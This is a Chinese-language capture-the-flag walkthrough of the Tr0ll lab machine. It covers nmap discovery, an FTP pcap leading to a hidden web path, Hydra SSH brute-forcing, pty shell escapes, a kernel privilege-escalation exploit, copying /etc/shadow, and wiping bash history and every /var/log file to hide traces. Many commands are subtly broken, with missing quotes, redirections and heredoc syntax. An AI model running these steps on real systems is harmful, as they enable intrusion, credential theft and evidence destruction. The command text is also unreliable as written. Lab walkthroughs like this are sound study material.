1. 环境准备与目标确认第一次接触Tr0ll靶机时我花了整整两小时才搞明白网络配置这个基础环节。很多新手教程会轻描淡写地说确保攻击机和靶机在同一网络但实际操作中光是虚拟机网络模式的选择就足够让人困惑。我建议使用VirtualBox或VMware的NAT模式这是最接近真实渗透测试环境的配置方式。在Kali Linux终端输入ip a查看本机IP时注意识别真正的网卡地址。以我的经验新手常会把docker虚拟网卡或VPN连接的地址误认为本机IP。比如看到192.168.190.138/24这样的输出要确认它对应的是eth0或ens33这类主网卡。接下来用nmap扫描同网段存活主机nmap -sP 192.168.190.0/24这个命令会列出所有在线设备但要注意排除网关地址通常以.1或.254结尾以及Kali自身的IP。Tr0ll靶机往往显示为中间段IP比如我遇到的192.168.190.139。有个实用技巧对比扫描前后的ARP缓存变化能更准确识别新上线设备arp -a | grep -v incomplete2. 深度信息收集实战发现目标IP后常规做法是扫描开放端口但这里有个容易被忽略的细节全端口扫描的耗时问题。我建议新手先用快速扫描确认主要服务nmap -T4 -F 192.168.190.139等确认有值得深入的服务后再执行全面扫描nmap -p- -sV -A -T4 192.168.190.139当看到21/FTP端口显示Anonymous登录允许时别急着兴奋。我遇到过三次这种情况能登录但目录空空如也。Tr0ll的特别之处在于它藏了个叫lol.pcap的流量包文件要用get命令下载到本地ftp get lol.pcap用Wireshark分析这个流量包时重点看TCP流序列。按CtrlAltShiftT调出流追踪窗口通过切换流编号从0开始递增能发现关键线索。在流#2中出现的sup3rs3cr3tdirlol路径就是突破Web应用的第一把钥匙。3. Web路径迷宫破解将发现的路径拼接到靶机IP后如http://192.168.190.139/sup3rs3cr3tdirlol往往会遇到404错误。这里需要点逆向思维尝试组合大小写、添加常见后缀。我最终是通过/sup3rs3cr3tdir/lol找到了隐藏目录。发现的roflmao文件看似乱码用strings命令解析后会出现关键提示strings roflmao | grep -i hint输出中的overflow和/this_is_not_important_but_keep_looking就是下一步的线索。这种套娃式的线索设计是Tr0ll的特色需要保持耐心逐层挖掘。在找到的用户名列表和密码提示后建议先整理成以下结构# users.txt overflow ... # passwords.txt Good_job_:) Pass.txt然后用hydra爆破SSH服务时务必添加-t 4参数控制线程数避免被靶机封禁hydra -L users.txt -P passwords.txt -t 4 ssh://192.168.190.1394. 突破伪终端限制成功SSH登录后你会发现陷入了伪终端陷阱——无法使用tab补全、方向键失效。这是Tr0ll的经典防御机制。先用Python快速生成真实shellpython -c import pty; pty.spawn(/bin/bash)如果Python不可用试试perl方案perl -e exec /bin/bash此时执行id会看到只是普通用户权限。提权前有个重要步骤检查可写目录。我习惯先用find找临时目录find / -type d -writable 2/dev/null | grep -v proc/tmp通常是首选但有些靶机会设置特殊权限限制。5. 多维度提权实战内核提权是最经典的方式。先收集系统信息uname -a cat /etc/issue dpkg -l 2/dev/null | grep -i kernel在Kali上搜索对应exp时建议用searchsploit的详细模式searchsploit -x linux/local/37292传输exp到靶机时如果遇到权限拒绝可以尝试编码传输# Kali端 base64 37292.c exp.txt # 靶机端 cat exp.c EOF [粘贴base64内容] EOF base64 -d exp.c exploit.c编译执行前务必检查靶机的gcc版本gcc --version缺少编译环境时可以尝试预编译的二进制文件。最后执行提权操作时建议先备份关键文件mkdir /tmp/backup cp /etc/passwd /etc/shadow /tmp/backup6. 后渗透清理痕迹拿到root权限后真正的渗透测试才完成一半。需要清理操作痕迹重点检查# 删除历史记录 echo ~/.bash_history history -c # 检查登录日志 lastlog # 清除web日志 find /var/log -name *.log -exec truncate -s 0 {} \;最后验证提权是否彻底成功cat /root/proof.txt这个文件内容就是最终的战利品。整个过程看似线性推进实则充满变数。我在第三次尝试时才注意到流量包里的路径提示有大小写区分这也正是渗透测试的魅力所在——每个细节都可能成为突破口。
